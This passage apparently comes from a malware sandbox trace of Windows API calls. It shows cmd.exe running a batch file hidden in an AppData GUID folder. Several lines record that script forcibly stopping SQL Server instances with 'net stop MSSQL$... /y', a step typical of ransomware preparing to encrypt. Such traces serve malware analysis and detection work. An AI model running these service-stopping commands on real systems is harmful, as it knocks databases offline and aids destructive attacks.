lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0216.713] SetErrorMode (uMode=0x0) returned 0x1 [0216.713] GetProcessHeap () returned 0x3e0000 [0216.713] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0216.713] GetProcessHeap () returned 0x3e0000 [0216.713] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0216.713] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.714] GetProcessHeap () returned 0x3e0000 [0216.714] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0216.714] GetProcessHeap () returned 0x3e0000 [0216.714] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0216.714] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0216.714] GetProcessHeap () returned 0x3e0000 [0216.714] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0216.714] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.714] GetProcessHeap () returned 0x3e0000 [0216.714] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0216.714] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0216.714] GetProcessHeap () returned 0x3e0000 [0216.715] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0216.715] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.715] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.715] GetLastError () returned 0x2 [0216.716] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.716] GetLastError () returned 0x2 [0216.716] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.717] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0216.717] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.717] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.717] GetLastError () returned 0x2 [0216.718] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0216.718] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.718] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.719] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0216.719] SetErrorMode (uMode=0x0) returned 0x1 [0216.719] GetProcessHeap () returned 0x3e0000 [0216.719] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0216.719] GetProcessHeap () returned 0x3e0000 [0216.719] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0216.719] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.719] GetProcessHeap () returned 0x3e0000 [0216.719] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0216.719] GetProcessHeap () returned 0x3e0000 [0216.719] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0216.720] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0216.720] GetProcessHeap () returned 0x3e0000 [0216.720] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0216.720] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.720] GetProcessHeap () returned 0x3e0000 [0216.720] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0216.720] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0216.720] GetProcessHeap () returned 0x3e0000 [0216.720] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0216.721] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.721] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.721] GetLastError () returned 0x2 [0216.722] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.722] GetLastError () returned 0x2 [0216.722] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.723] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0216.723] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0216.723] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.723] GetLastError () returned 0x2 [0216.724] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0216.724] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0216.724] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.724] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0216.724] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0216.724] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0216.725] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.725] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$SQLEXPRESS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$SQLEXPRESS /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$SQLEXPRESS /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x848, dwThreadId=0x648)) returned 1 [0216.729] CloseHandle (hObject=0x78) returned 1 [0216.729] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.729] GetProcessHeap () returned 0x3e0000 [0216.729] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.729] GetEnvironmentStringsW () returned 0x3f8408* [0216.729] GetProcessHeap () returned 0x3e0000 [0216.729] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.729] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.729] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0216.868] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0216.869] CloseHandle (hObject=0x74) returned 1 [0216.869] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0216.869] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0216.869] GetProcessHeap () returned 0x3e0000 [0216.869] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.869] GetEnvironmentStringsW () returned 0x3f8408* [0216.869] GetProcessHeap () returned 0x3e0000 [0216.869] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.869] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.869] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.869] GetProcessHeap () returned 0x3e0000 [0216.869] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.869] GetEnvironmentStringsW () returned 0x3f8408* [0216.869] GetProcessHeap () returned 0x3e0000 [0216.869] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.870] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.870] GetProcessHeap () returned 0x3e0000 [0216.870] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0216.870] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0216.870] _get_osfhandle (_FileHandle=1) returned 0x264 [0216.870] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0216.870] _get_osfhandle (_FileHandle=1) returned 0x264 [0216.870] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0216.870] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0216.870] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0216.870] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0216.870] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0216.871] SetConsoleInputExeNameW () returned 0x1 [0216.871] GetConsoleOutputCP () returned 0x1b5 [0216.871] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0216.871] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.871] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0216.871] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0216.871] _get_osfhandle (_FileHandle=3) returned 0x74 [0216.871] SetFilePointer (in: hFile=0x74, lDistanceToMove=5865, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x16e9 [0216.871] GetProcessHeap () returned 0x3e0000 [0216.871] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0216.871] GetProcessHeap () returned 0x3e0000 [0216.871] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0216.871] GetProcessHeap () returned 0x3e0000 [0216.871] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0216.871] GetProcessHeap () returned 0x3e0000 [0216.871] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0216.872] GetProcessHeap () returned 0x3e0000 [0216.872] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0216.872] GetProcessHeap () returned 0x3e0000 [0216.872] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0216.872] GetProcessHeap () returned 0x3e0000 [0216.872] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0216.872] GetProcessHeap () returned 0x3e0000 [0216.872] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0216.872] GetProcessHeap () returned 0x3e0000 [0216.872] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0216.872] GetProcessHeap () returned 0x3e0000 [0216.872] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0216.872] GetProcessHeap () returned 0x3e0000 [0216.872] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0216.872] GetProcessHeap () returned 0x3e0000 [0216.872] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0216.872] GetProcessHeap () returned 0x3e0000 [0216.872] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0216.872] _get_osfhandle (_FileHandle=3) returned 0x74 [0216.872] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16e9 [0216.872] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1d8, lpOverlapped=0x0) returned 1 [0216.872] SetFilePointer (in: hFile=0x74, lDistanceToMove=5897, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1709 [0216.872] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=32, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$PRACTTICEBGC /y\r\ntor /y\r\n /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 32 [0216.873] _get_osfhandle (_FileHandle=3) returned 0x74 [0216.873] GetFileType (hFile=0x74) returned 0x1 [0216.873] _get_osfhandle (_FileHandle=3) returned 0x74 [0216.873] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1709 [0216.873] GetProcessHeap () returned 0x3e0000 [0216.873] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0216.873] GetProcessHeap () returned 0x3e0000 [0216.873] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0216.892] _tell (_FileHandle=3) returned 5897 [0216.892] _close (_FileHandle=3) returned 0 [0216.892] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0216.892] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0216.892] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0216.892] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0216.892] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0216.892] _wcsicmp (_String1="net", _String2="CD") returned 11 [0216.892] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0216.892] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0216.892] _wcsicmp (_String1="net", _String2="REN") returned -4 [0216.892] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0216.892] _wcsicmp (_String1="net", _String2="SET") returned -5 [0216.892] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0216.892] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0216.892] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0216.892] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0216.892] _wcsicmp (_String1="net", _String2="MD") returned 1 [0216.892] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0216.892] _wcsicmp (_String1="net", _String2="RD") returned -4 [0216.892] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0216.892] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0216.892] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0216.892] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0216.892] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0216.892] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0216.892] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0216.892] _wcsicmp (_String1="net", _String2="VER") returned -8 [0216.892] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0216.892] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0216.892] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0216.892] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0216.892] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0216.892] _wcsicmp (_String1="net", _String2="START") returned -5 [0216.892] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0216.893] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0216.893] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0216.893] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0216.893] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0216.893] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0216.893] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0216.893] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0216.893] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0216.893] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0216.893] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0216.893] SetErrorMode (uMode=0x0) returned 0x1 [0216.893] GetProcessHeap () returned 0x3e0000 [0216.893] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0216.893] GetProcessHeap () returned 0x3e0000 [0216.893] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0216.894] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.894] GetProcessHeap () returned 0x3e0000 [0216.894] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0216.894] GetProcessHeap () returned 0x3e0000 [0216.894] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0216.894] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0216.894] GetProcessHeap () returned 0x3e0000 [0216.894] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0216.894] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.894] GetProcessHeap () returned 0x3e0000 [0216.894] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0216.895] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0216.895] GetProcessHeap () returned 0x3e0000 [0216.895] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0216.895] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.895] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.896] GetLastError () returned 0x2 [0216.896] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.896] GetLastError () returned 0x2 [0216.897] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0216.897] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.897] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.898] GetLastError () returned 0x2 [0216.898] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0216.898] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.898] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.899] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0216.899] SetErrorMode (uMode=0x0) returned 0x1 [0216.899] GetProcessHeap () returned 0x3e0000 [0216.899] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0216.899] GetProcessHeap () returned 0x3e0000 [0216.899] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0216.899] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.900] GetProcessHeap () returned 0x3e0000 [0216.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0216.900] GetProcessHeap () returned 0x3e0000 [0216.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0216.900] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0216.900] GetProcessHeap () returned 0x3e0000 [0216.900] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0216.900] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.900] GetProcessHeap () returned 0x3e0000 [0216.900] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0216.900] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0216.900] GetProcessHeap () returned 0x3e0000 [0216.901] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0216.901] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.901] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.901] GetLastError () returned 0x2 [0216.902] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.902] GetLastError () returned 0x2 [0216.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.903] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0216.903] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0216.903] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.903] GetLastError () returned 0x2 [0216.904] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, 